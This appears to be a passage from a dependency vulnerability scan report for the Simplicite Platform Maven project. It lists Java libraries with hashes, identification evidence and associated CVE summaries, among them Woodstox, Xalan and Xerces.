Inc. Medium Vendor pom developer org V2COM Medium Vendor pom developer org URL http://www.airbus.com Medium Vendor pom developer org URL http://www.catmedia.us Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.iem.com Medium Vendor pom developer org URL http://www.v2com.mobi/ Medium Vendor pom groupid javax.measure Highest Vendor pom name Units of Measurement API High Vendor pom organization name Jean-Marie Dautelle, Werner Keil, V2COM High Vendor pom organization url http://unitsofmeasurement.github.io Medium Vendor pom url http://unitsofmeasurement.github.io/ Highest Product file name unit-api High Product jar package name javax Highest Product jar package name measure Highest Product jar package name unit Highest Product Manifest bundle-docurl http://unitsofmeasurement.github.io Low Product Manifest Bundle-Name Units of Measurement API Medium Product Manifest bundle-symbolicname javax.measure.unit-api Medium Product Manifest Implementation-Title Units of Measurement API High Product Manifest implementation-url http://unitsofmeasurement.github.io Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Units of Measurement 
API Medium Product pom artifactid unit-api Highest Product pom developer email christopher.senior@gmail.com Low Product pom developer email eralmas7@yahoo.com Low Product pom developer email jean-marie@dautelle.com Low Product pom developer email karen.legrand@iem.com Low Product pom developer email llima@v2com.mobi Low Product pom developer email martin.desruisseaux@geomatys.com Low Product pom developer email mohamed.taman@gmail.com Low Product pom developer email otaviopolianasantana@gmail.com Low Product pom developer email rajmahendra@gmail.com Low Product pom developer email werner@uom.technology Low Product pom developer id dautelle Low Product pom developer id desruisseaux Low Product pom developer id duckasteroid Low Product pom developer id eralmas7 Low Product pom developer id karen_legrand Low Product pom developer id leomrlima Low Product pom developer id mohamed-taman Low Product pom developer id otaviojava Low Product pom developer id rajmahendra Low Product pom developer id werner.keil Low Product pom developer name Almas Shaikh Low Product pom developer name Chris Senior Low Product pom developer name Jean-Marie Dautelle Low Product pom developer name Karen Legrand Low Product pom developer name Leonardo de Moura Rocha Lima Low Product pom developer name Martin Desruisseaux Low Product pom developer name Mohamed Mahmoud Taman Low Product pom developer name Otávio Gonçalves de Santana Low Product pom developer name Rajmahendra Hegde Low Product pom developer name Werner Keil Low Product pom developer org Airbus Low Product pom developer org Creative Arts & Technologies Low Product pom developer org Geomatys Low Product pom developer org Individual / JP Morgan Low Product pom developer org Individual / Morocco JUG Low Product pom developer org Individual / SouJava Low Product pom developer org Innovation Emergency Management (IEM) Low Product pom developer org JUG Chennai Low Product pom developer org Snap-on Inc. 
Low Product pom developer org V2COM Low Product pom developer org URL http://www.airbus.com Low Product pom developer org URL http://www.catmedia.us Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.iem.com Low Product pom developer org URL http://www.v2com.mobi/ Low Product pom groupid javax.measure Highest Product pom name Units of Measurement API High Product pom organization name Jean-Marie Dautelle, Werner Keil, V2COM Low Product pom organization url http://unitsofmeasurement.github.io Low Product pom url http://unitsofmeasurement.github.io/ Medium Version file version 1.0 High Version Manifest Implementation-Version 1.0 High Version pom version 1.0 Highest
vorbis-java-core-0.8.jar
File Path: /var/simplicite/.m2/repository/org/gagravarr/vorbis-java-core/0.8/vorbis-java-core-0.8.jar
MD5: 71b623b57f56daf112bddb3337ee896d
SHA1: 7e9937c2575cda2e3fc116415117c74f23e43fa6
SHA256: 879bb0c8923fea686609e207fd9050ab246e001868341c725929405e755cf68e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | vorbis-java-core | High
Vendor | jar | package name | gagravarr | Highest
Vendor | jar | package name | gagravarr | Low
Vendor | jar | package name | ogg | Highest
Vendor | jar | package name | vorbis | Highest
Vendor | pom | artifactid | vorbis-java-core | Highest
Vendor | pom | artifactid | vorbis-java-core | Low
Vendor | pom | groupid | org.gagravarr | Highest
Vendor | pom | name | Ogg and Vorbis for Java, Core | High
Vendor | pom | parent-artifactid | vorbis-java-parent | Low
Vendor | pom | url | Gagravarr/VorbisJava | Highest
Product | file | name | vorbis-java-core | High
Product | jar | package name | gagravarr | Highest
Product | jar | package name | ogg | Highest
Product | jar | package name | vorbis | Highest
Product | pom | artifactid | vorbis-java-core | Highest
Product | pom | groupid | org.gagravarr | Highest
Product | pom | name | Ogg and Vorbis for Java, Core | High
Product | pom | parent-artifactid | vorbis-java-parent | Medium
Product | pom | url | Gagravarr/VorbisJava | High
Version | file | version | 0.8 | High
Version | pom | version | 0.8 | Highest
vorbis-java-tika-0.8.jar
File Path: /var/simplicite/.m2/repository/org/gagravarr/vorbis-java-tika/0.8/vorbis-java-tika-0.8.jar
MD5: 85c7b34d5f94e66bf0c79f5d673db750
SHA1: 4ddbb27ac5884a0f0398a63d46a89d3bc87dc457
SHA256: a1b62281a99aec10dc69db1d2f8250952dca5841eedf1167b6b6f9585e2d0d26
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | vorbis-java-tika | High
Vendor | jar | package name | gagravarr | Highest
Vendor | jar | package name | gagravarr | Low
Vendor | jar | package name | tika | Highest
Vendor | jar | package name | tika | Low
Vendor | pom | artifactid | vorbis-java-tika | Highest
Vendor | pom | artifactid | vorbis-java-tika | Low
Vendor | pom | groupid | org.gagravarr | Highest
Vendor | pom | name | Apache Tika plugin for Ogg, Vorbis and FLAC | High
Vendor | pom | parent-artifactid | vorbis-java-parent | Low
Vendor | pom | url | Gagravarr/VorbisJava | Highest
Product | file | name | vorbis-java-tika | High
Product | jar | package name | gagravarr | Highest
Product | jar | package name | tika | Highest
Product | jar | package name | tika | Low
Product | pom | artifactid | vorbis-java-tika | Highest
Product | pom | groupid | org.gagravarr | Highest
Product | pom | name | Apache Tika plugin for Ogg, Vorbis and FLAC | High
Product | pom | parent-artifactid | vorbis-java-parent | Medium
Product | pom | url | Gagravarr/VorbisJava | High
Version | file | version | 0.8 | High
Version | pom | version | 0.8 | Highest
wmf2svg-0.9.8.jar
Description:
WMF to SVG Converting Tool & Library
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/net/arnx/wmf2svg/0.9.8/wmf2svg-0.9.8.jar
MD5: 34b920f0aa840b1792702d253c2c58b7
SHA1: 365614a3ee72ec475d9032f906d37b753fbe2bfa
SHA256: c7f136558140c3fbe9410199ca509895faad4fa79bdc185e72a868f1c2819b4a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | wmf2svg | High
Vendor | jar | package name | arnx | Highest
Vendor | jar | package name | arnx | Low
Vendor | jar | package name | net | Highest
Vendor | jar | package name | net | Low
Vendor | jar | package name | wmf2svg | Highest
Vendor | jar | package name | wmf2svg | Low
Vendor | pom | artifactid | wmf2svg | Highest
Vendor | pom | artifactid | wmf2svg | Low
Vendor | pom | developer email | hidekatsu.izuno@gmail.com | Low
Vendor | pom | developer id | hidekatsu.izuno | Medium
Vendor | pom | developer name | Hidekatsu Izuno | Medium
Vendor | pom | groupid | net.arnx | Highest
Vendor | pom | name | wmf2svg | High
Vendor | pom | url | http://wmf2svg.sourceforge.jp/ | Highest
Product | file | name | wmf2svg | High
Product | jar | package name | arnx | Highest
Product | jar | package name | arnx | Low
Product | jar | package name | gdi | Low
Product | jar | package name | net | Highest
Product | jar | package name | wmf2svg | Highest
Product | jar | package name | wmf2svg | Low
Product | pom | artifactid | wmf2svg | Highest
Product | pom | developer email | hidekatsu.izuno@gmail.com | Low
Product | pom | developer id | hidekatsu.izuno | Low
Product | pom | developer name | Hidekatsu Izuno | Low
Product | pom | groupid | net.arnx | Highest
Product | pom | name | wmf2svg | High
Product | pom | url | http://wmf2svg.sourceforge.jp/ | Medium
Version | file | version | 0.9.8 | High
Version | pom | version | 0.9.8 | Highest
woodstox-core-6.2.0.jar (shaded: com.sun.xml.bind.jaxb:isorelax:20090621)
Description:
Unknown version of isorelax library used in JAXB project
File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar/META-INF/maven/com.sun.xml.bind.jaxb/isorelax/pom.xml
MD5: 6fbb4bc95fbf2072bc6e3b790553fe81
SHA1: 314ec72948d5c1fc71d553cbbd7a130caa6f9f13
SHA256: cda6451d0231a973352b592ff950e39224ba6ba1a2f35eeab66511b5c225dff1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | isorelax | Low
Vendor | pom | groupid | com.sun.xml.bind.jaxb | Highest
Vendor | pom | name | JAXB isorelax library | High
Vendor | pom | parent-artifactid | jvnet-parent | Low
Vendor | pom | parent-groupid | net.java | Medium
Product | pom | artifactid | isorelax | Highest
Product | pom | groupid | com.sun.xml.bind.jaxb | Highest
Product | pom | name | JAXB isorelax library | High
Product | pom | parent-artifactid | jvnet-parent | Medium
Product | pom | parent-groupid | net.java | Medium
Version | pom | parent-version | 20090621 | Low
Version | pom | version | 20090621 | Highest
CVE-2023-34411
The xml-rs crate before 0.8.14 for Rust and Crab allows a denial of service (panic) via an invalid <! token (such as <!DOCTYPEs/%<!A nesting) in an XML document. The earliest affected version is 0.8.9. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
woodstox-core-6.2.0.jar (shaded: net.java.dev.msv:xsdlib:2013.6.1)
Description:
XML Schema datatypes library
File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar/META-INF/maven/net.java.dev.msv/xsdlib/pom.xml
MD5: aaf872ed9d1aabee25e03c2a132ffd8e
SHA1: 47f218a999411ed028f089d59ebef8f14e0fe914
SHA256: d6e83c124436049d83238fc532a26c5d8ccd7e4ab10eba6d96043c850ac82f3c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | xsdlib | Low
Vendor | pom | groupid | net.java.dev.msv | Highest
Vendor | pom | name | MSV XML Schema Library | High
Vendor | pom | parent-artifactid | msv | Low
Product | pom | artifactid | xsdlib | Highest
Product | pom | groupid | net.java.dev.msv | Highest
Product | pom | name | MSV XML Schema Library | High
Product | pom | parent-artifactid | msv | Medium
Version | pom | version | 2013.6.1 | Highest
woodstox-core-6.2.0.jar
Description:
Woodstox is a high-performance XML processor that implements Stax (JSR-173),
SAX2 and Stax2 APIs
License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar
MD5: 0a45f2441d81fb2c01781f11ee1e3fd3
SHA1: bfe9e1c4436230011e6aadced5df9262ec821cda
SHA256: 078f8f918344f2c195917339060dedfb758cec1e014f96c6082fe0bdb6037af5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | woodstox-core | High
Vendor | jar | package name | stax | Highest
Vendor | Manifest | bundle-docurl | https://github.com/FasterXML/woodstox | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.woodstox.woodstox-core | Medium
Vendor | Manifest | implementation-build-date | 2020-04-25 20:08:23+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.woodstox | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | woodstox-core | Highest
Vendor | pom | artifactid | woodstox-core | Low
Vendor | pom | developer email | tatu@fasterxml.com | Low
Vendor | pom | developer id | cowtowncoder | Medium
Vendor | pom | developer name | Tatu Saloranta | Medium
Vendor | pom | groupid | com.fasterxml.woodstox | Highest
Vendor | pom | name | Woodstox | High
Vendor | pom | organization name | FasterXML | High
Vendor | pom | organization url | http://fasterxml.com | Medium
Vendor | pom | parent-artifactid | oss-parent | Low
Vendor | pom | parent-groupid | com.fasterxml | Medium
Vendor | pom | url | FasterXML/woodstox | Highest
Product | file | name | woodstox-core | High
Product | jar | package name | osgi | Highest
Product | jar | package name | stax | Highest
Product | Manifest | bundle-docurl | https://github.com/FasterXML/woodstox | Low
Product | Manifest | Bundle-Name | Woodstox | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.woodstox.woodstox-core | Medium
Product | Manifest | implementation-build-date | 2020-04-25 20:08:23+0000 | Low
Product | Manifest | Implementation-Title | Woodstox | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | Manifest | specification-title | Woodstox | Medium
Product | pom | artifactid | woodstox-core | Highest
Product | pom | developer email | tatu@fasterxml.com | Low
Product | pom | developer id | cowtowncoder | Low
Product | pom | developer name | Tatu Saloranta | Low
Product | pom | groupid | com.fasterxml.woodstox | Highest
Product | pom | name | Woodstox | High
Product | pom | organization name | FasterXML | Low
Product | pom | organization url | http://fasterxml.com | Low
Product | pom | parent-artifactid | oss-parent | Medium
Product | pom | parent-groupid | com.fasterxml | Medium
Product | pom | url | FasterXML/woodstox | High
Version | file | version | 6.2.0 | High
Version | Manifest | Bundle-Version | 6.2.0 | High
Version | Manifest | Implementation-Version | 6.2.0 | High
Version | pom | parent-version | 6.2.0 | Low
Version | pom | version | 6.2.0 | Highest
CVE-2022-40152
Those using Woodstox to parse XML data may be vulnerable to Denial of Service attacks (DOS) if DTD support is enabled. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
xalan-2.7.2.jar
Description:
Xalan-Java is an XSLT processor for transforming XML documents into HTML,
text, or other XML document types. It implements XSL Transformations (XSLT)
Version 1.0 and XML Path Language (XPath) Version 1.0 and can be used from
the command line, in an applet or a servlet, or as a module in other programs.
File Path: /var/simplicite/.m2/repository/xalan/xalan/2.7.2/xalan-2.7.2.jar
MD5: 6aa6607802502c8016b676f25f8e4873
SHA1: d55d3f02a56ec4c25695fe67e1334ff8c2ecea23
SHA256: a44bd80e82cb0f4cfac0dac8575746223802514e3cec9dc75235bc0de646af14
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | xalan | High
Vendor | jar | package name | and | Highest
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | processor | Highest
Vendor | jar | package name | version | Highest
Vendor | jar | package name | xalan | Highest
Vendor | jar | package name | xml | Highest
Vendor | jar | package name | xpath | Highest
Vendor | jar | package name | xslt | Highest
Vendor | manifest: java_cup/runtime/ | Implementation-Vendor | Princeton University | Medium
Vendor | manifest: org/apache/bcel/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | manifest: org/apache/regexp/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | manifest: org/apache/xalan/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | manifest: org/apache/xalan/xsltc/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | manifest: org/apache/xml/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | manifest: org/apache/xpath/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | pom | artifactid | xalan | Highest
Vendor | pom | artifactid | xalan | Low
Vendor | pom | groupid | xalan | Highest
Vendor | pom | name | Xalan Java | High
Vendor | pom | parent-artifactid | apache | Low
Vendor | pom | parent-groupid | org.apache | Medium
Vendor | pom | url | http://xml.apache.org/xalan-j/ | Highest
Product | file | name | xalan | High
Product | jar | package name | and | Highest
Product | jar | package name | apache | Highest
Product | jar | package name | bcel | Highest
Product | jar | package name | code | Highest
Product | jar | package name | expression | Highest
Product | jar | package name | processor | Highest
Product | jar | package name | regexp | Highest
Product | jar | package name | runtime | Highest
Product | jar | package name | version | Highest
Product | jar | package name | xalan | Highest
Product | jar | package name | xml | Highest
Product | jar | package name | xpath | Highest
Product | jar | package name | xslt | Highest
Product | jar | package name | xsltc | Highest
Product | manifest: java_cup/runtime/ | Implementation-Title | runtime | Medium
Product | manifest: java_cup/runtime/ | Specification-Title | Runtime component of JCup | Medium
Product | manifest: org/apache/bcel/ | Implementation-Title | org.apache.bcel | Medium
Product | manifest: org/apache/bcel/ | Specification-Title | Byte Code Engineering Library | Medium
Product | manifest: org/apache/regexp/ | Implementation-Title | org.apache.regexp | Medium
Product | manifest: org/apache/regexp/ | Specification-Title | Java Regular Expression package | Medium
Product | manifest: org/apache/xalan/ | Implementation-Title | org.apache.xalan | Medium
Product | manifest: org/apache/xalan/ | Specification-Title | Java API for XML Processing | Medium
Product | manifest: org/apache/xalan/xsltc/ | Implementation-Title | org.apache.xalan.xsltc | Medium
Product | manifest: org/apache/xalan/xsltc/ | Specification-Title | Java API for XML Processing | Medium
Product | manifest: org/apache/xml/ | Implementation-Title | org.apache.xml | Medium
Product | manifest: org/apache/xpath/ | Implementation-Title | org.apache.xpath | Medium
Product | pom | artifactid | xalan | Highest
Product | pom | groupid | xalan | Highest
Product | pom | name | Xalan Java | High
Product | pom | parent-artifactid | apache | Medium
Product | pom | parent-groupid | org.apache | Medium
Product | pom | url | http://xml.apache.org/xalan-j/ | Medium
Version | file | version | 2.7.2 | High
Version | manifest: java_cup/runtime/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/bcel/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/regexp/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/xalan/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/xalan/xsltc/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/xml/ | Implementation-Version | 2.7.2 | Medium
Version | manifest: org/apache/xpath/ | Implementation-Version | 2.7.2 | Medium
Version | pom | parent-version | 2.7.2 | Low
Version | pom | version | 2.7.2 | Highest
CVE-2022-34169
The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
xalan-interpretive-11.0.0.jar
Description:
xalan-interpretive
License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/org/apache/xalan-interpretive/11.0.0/xalan-interpretive-11.0.0.jar
MD5: fc5a8e36ca1cbe5eb05dbf328e058403
SHA1: 7494b62aced4c3d0ffa259e59c435dc9bd7f07b3
SHA256: badfeb922041262d667363e05bd1cea3947f2ad63dc0f586582ef20ab5a52456
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | xalan-interpretive | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | apache | Low
Vendor | jar | package name | docx4j | Highest
Vendor | jar | package name | docx4j | Low
Vendor | jar | package name | org | Highest
Vendor | jar | package name | org | Low
Vendor | jar | package name | xalan | Highest
Vendor | pom | artifactid | xalan-interpretive | Highest
Vendor | pom | artifactid | xalan-interpretive | Low
Vendor | pom | developer email | dev@xalan.apache.org | Low
Vendor | pom | developer email | jason@plutext.org | Low
Vendor | pom | developer name | Jason Harrop | Medium
Vendor | pom | developer name | Xalan committers | Medium
Vendor | pom | developer org | Apache | Medium
Vendor | pom | developer org | Plutext | Medium
Vendor | pom | developer org URL | http://people.apache.org/committers-by-project.html#xalan | Medium
Vendor | pom | developer org URL | http://www.plutext.com | Medium
Vendor | pom | groupid | org.docx4j.org.apache | Highest
Vendor | pom | name | xalan-interpretive | High
Vendor | pom | url | http://xml.apache.org/xalan-j/ | Highest
Product | file | name | xalan-interpretive | High
Product | jar | package name | apache | Highest
Product | jar | package name | apache | Low
Product | jar | package name | docx4j | Highest
Product | jar | package name | org | Highest
Product | jar | package name | org | Low
Product | jar | package name | xalan | Highest
Product | pom | artifactid | xalan-interpretive | Highest
Product | pom | developer email | dev@xalan.apache.org | Low
Product | pom | developer email | jason@plutext.org | Low
Product | pom | developer name | Jason Harrop | Low
Product | pom | developer name | Xalan committers | Low
Product | pom | developer org | Apache | Low
Product | pom | developer org | Plutext | Low
Product | pom | developer org URL | http://people.apache.org/committers-by-project.html#xalan | Low
Product | pom | developer org URL | http://www.plutext.com | Low
Product | pom | groupid | org.docx4j.org.apache | Highest
Product | pom | name | xalan-interpretive | High
Product | pom | url | http://xml.apache.org/xalan-j/ | Medium
Version | file | version | 11.0.0 | High
Version | pom | version | 11.0.0 | Highest
xalan-serializer-11.0.0.jar
Description:
xalan-serializer
License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/org/apache/xalan-serializer/11.0.0/xalan-serializer-11.0.0.jar
MD5: f21112d50f8c5e067bcb388697cb6af1
SHA1: 7a6b5802bdba3d3b12e935b8a0ae2e020d839cfd
SHA256: ee20541b9180bbd4dc4d55b825e397aefc1545d11d819e4d488012fa76a4b6dc
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | xalan-serializer | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | apache | Low
Vendor | jar | package name | docx4j | Highest
Vendor | jar | package name | docx4j | Low
Vendor | jar | package name | org | Highest
Vendor | jar | package name | org | Low
Vendor | pom | artifactid | xalan-serializer | Highest
Vendor | pom | artifactid | xalan-serializer | Low
Vendor | pom | developer email | dev@xalan.apache.org | Low
Vendor | pom | developer email | jason@plutext.org | Low
Vendor | pom | developer name | Jason Harrop | Medium
Vendor | pom | developer name | Xalan committers | Medium
Vendor | pom | developer org | Apache | Medium
Vendor | pom | developer org | Plutext | Medium
Vendor | pom | developer org URL | http://people.apache.org/committers-by-project.html#xalan | Medium
Vendor | pom | developer org URL | http://www.plutext.com | Medium
Vendor | pom | groupid | org.docx4j.org.apache | Highest
Vendor | pom | name | xalan-serializer | High
Vendor | pom | url | http://xml.apache.org/xalan-j/ | Highest
Product | file | name | xalan-serializer | High
Product | jar | package name | apache | Highest
Product | jar | package name | apache | Low
Product | jar | package name | docx4j | Highest
Product | jar | package name | org | Highest
Product | jar | package name | org | Low
Product | jar | package name | xml | Low
Product | pom | artifactid | xalan-serializer | Highest
Product | pom | developer email | dev@xalan.apache.org | Low
Product | pom | developer email | jason@plutext.org | Low
Product | pom | developer name | Jason Harrop | Low
Product | pom | developer name | Xalan committers | Low
Product | pom | developer org | Apache | Low
Product | pom | developer org | Plutext | Low
Product | pom | developer org URL | http://people.apache.org/committers-by-project.html#xalan | Low
Product | pom | developer org URL | http://www.plutext.com | Low
Product | pom | groupid | org.docx4j.org.apache | Highest
Product | pom | name | xalan-serializer | High
Product | pom | url | http://xml.apache.org/xalan-j/ | Medium
Version | file | version | 11.0.0 | High
Version | pom | version | 11.0.0 | Highest
xercesImpl-2.12.0.jar
Description:
Xerces2 is the next generation of high performance, fully compliant XML parsers in the Apache Xerces family. This new version of Xerces introduces the Xerces Native Interface (XNI), a complete framework for building parser components and configurations that is extremely modular and easy to program.
The Apache Xerces2 parser is the reference implementation of XNI but other parser components, configurations, and parsers can be written using the Xerces Native Interface. For complete design and implementation documents, refer to the XNI Manual.
Xerces2 is a fully conforming XML Schema 1.0 processor. A partial experimental implementation of the XML Schema 1.1 Structures and Datatypes Working Drafts (December 2009) and an experimental implementation of the XML Schema Definition Language (XSD): Component Designators (SCD) Candidate Recommendation (January 2010) are provided for evaluation. For more information, refer to the XML Schema page.
Xerces2 also provides a complete implementation of the Document Object Model Level 3 Core and Load/Save W3C Recommendations and provides a complete implementation of the XML Inclusions (XInclude) W3C Recommendation. It also provides support for OASIS XML Catalogs v1.1.
Xerces2 is able to parse documents written according to the XML 1.1 Recommendation, except that it does not yet provide an option to enable normalization checking as described in section 2.13 of this specification. It also handles namespaces according to the XML Namespaces 1.1 Recommendation, and will correctly serialize XML 1.1 documents if the DOM level 3 load/save APIs are in use.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/xerces/xercesImpl/2.12.0/xercesImpl-2.12.0.jar
MD5: b89632b53c4939a2982bcb52806f6dec
SHA1: f02c844149fd306601f20e0b34853a670bef7fa2
SHA256: b50d3a4ca502faa4d1c838acb8aa9480446953421f7327e338c5dda3da5e76d0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xercesImpl High Vendor jar package name apache Highest Vendor jar package name datatypes Highest Vendor jar package name dom Highest Vendor jar package name parsers Highest Vendor jar package name serialize Highest Vendor jar package name version Highest Vendor jar package name w3c Highest Vendor jar package name xerces Highest Vendor jar package name xinclude Highest Vendor jar package name xml Highest Vendor jar package name xni Highest Vendor manifest: javax/xml/datatype/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/namespace/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/parsers/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/stream/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/transform/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/validation/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/xpath/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xerces/impl/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xerces/xni/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/w3c/dom/ Implementation-Vendor World Wide Web Consortium Medium Vendor manifest: org/w3c/dom/ls/ Implementation-Vendor World Wide Web Consortium Medium Vendor manifest: org/xml/sax/ Implementation-Vendor David Megginson Medium Vendor pom artifactid xercesImpl Highest Vendor pom artifactid xercesImpl Low Vendor pom developer email j-dev@xerces.apache.org Low Vendor pom developer id xerces Medium Vendor pom developer name Apache Software Foundation Medium Vendor pom developer org Apache Software Foundation Medium Vendor pom developer org URL http://www.apache.org Medium Vendor pom groupid xerces Highest Vendor pom name 
Xerces2-j High Vendor pom url https://xerces.apache.org/xerces2-j/ Highest Product file name xercesImpl High Product hint analyzer product xerces-j Highest Product jar package name apache Highest Product jar package name datatype Highest Product jar package name datatypes Highest Product jar package name dom Highest Product jar package name impl Highest Product jar package name parsers Highest Product jar package name serialize Highest Product jar package name validation Highest Product jar package name version Highest Product jar package name w3c Highest Product jar package name xerces Highest Product jar package name xinclude Highest Product jar package name xml Highest Product jar package name xni Highest Product jar package name xpath Highest Product manifest: javax/xml/datatype/ Implementation-Title javax.xml.datatype Medium Product manifest: javax/xml/datatype/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/namespace/ Implementation-Title javax.xml.namespace Medium Product manifest: javax/xml/namespace/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/parsers/ Implementation-Title javax.xml.parsers Medium Product manifest: javax/xml/parsers/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/stream/ Implementation-Title javax.xml.stream Medium Product manifest: javax/xml/stream/ Specification-Title Streaming API for XML Medium Product manifest: javax/xml/transform/ Implementation-Title javax.xml.transform Medium Product manifest: javax/xml/transform/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/validation/ Implementation-Title javax.xml.validation Medium Product manifest: javax/xml/validation/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/xpath/ Implementation-Title javax.xml.xpath Medium Product manifest: javax/xml/xpath/ Specification-Title Java API for XML Processing Medium Product 
manifest: org/apache/xerces/impl/ Implementation-Title org.apache.xerces.impl.Version Medium Product manifest: org/apache/xerces/xni/ Implementation-Title org.apache.xerces.xni Medium Product manifest: org/apache/xerces/xni/ Specification-Title Xerces Native Interface Medium Product manifest: org/w3c/dom/ Implementation-Title org.w3c.dom Medium Product manifest: org/w3c/dom/ Specification-Title Document Object Model, Level 3 Core Medium Product manifest: org/w3c/dom/ls/ Implementation-Title org.w3c.dom.ls Medium Product manifest: org/w3c/dom/ls/ Specification-Title Document Object Model, Level 3 Load and Save Medium Product manifest: org/xml/sax/ Implementation-Title org.xml.sax Medium Product manifest: org/xml/sax/ Specification-Title Simple API for XML Medium Product pom artifactid xercesImpl Highest Product pom developer email j-dev@xerces.apache.org Low Product pom developer id xerces Low Product pom developer name Apache Software Foundation Low Product pom developer org Apache Software Foundation Low Product pom developer org URL http://www.apache.org Low Product pom groupid xerces Highest Product pom name Xerces2-j High Product pom url https://xerces.apache.org/xerces2-j/ Medium Version file version 2.12.0 High Version manifest: org/apache/xerces/impl/ Implementation-Version 2.12.0 Medium Version pom version 2.12.0 Highest
pkg:maven/xerces/xercesImpl@2.12.0 (Confidence: High)
cpe:2.3:a:apache:xerces-j:2.12.0:*:*:*:*:*:*:* (Confidence: Low)
cpe:2.3:a:apache:xerces2_java:2.12.0:*:*:*:*:*:*:* (Confidence: Low)
CVE-2022-23437
There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for a prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
